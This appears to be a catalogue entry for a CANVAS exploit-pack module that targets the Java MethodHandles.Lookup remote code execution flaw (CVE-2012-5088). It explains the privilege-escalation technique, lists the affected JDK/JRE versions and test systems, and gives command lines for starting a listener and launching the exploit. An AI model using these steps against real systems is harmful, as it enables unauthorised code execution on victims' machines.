| Name | java_CVE_2012_5088 |
| CVE | CVE-2012-5088 |
| Exploit Pack | CANVAS |
| Description | Java MethodHandles.Lookup Remote Code Execution |
| Notes | CVE Name: CVE-2012-5088 VENDOR: Sun Notes: The exploitation technique is abusing bug patched in CVE-2012-5088 which is allowing to use reflection with full privileges. This is due to the fact that we are getting an instance of java.lang.invoke.MethodHandles.Lookup by calling the static method java.lang.invoke.MethodHandles.lookup() using the AverageRangeStatisticImpl class which is part of the JDK so the lookup object has a "trusted" immediate caller giving us full privileges Then we make use of the AnonymousClassLoader technique to fully exploit the target. Affected versions JDK and JRE 7 Update 7 and earlier Tested on: - Windows 7 with JDK/JRE 7 update 7 - Ubuntu 11.10 with JDK/JRE 7 update 7 - Ubuntu 11.10 with JDK/JRE 7 update 6 To run from command line, first start the listener (UNIVERSAL): python commandlineInterface.py -l 192.168.1.10 -p 5555 -v 17 And then run the exploit from clientd: python ./exploits/clientd/clientd.py -l 192.168.1.10 -d 5555 -O server_port:8080 -O allowed_attack_modules:java_CVE_2012_5088 -O allowed_recon_modules:js_recon -O auto_detect_exploits:0 Repeatability: Infinite (client side - no crash) References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5088 https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-5088 http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html Date public: 16/10/2012 |
| Learn more about the CANVAS Exploit Pack here: CANVAS |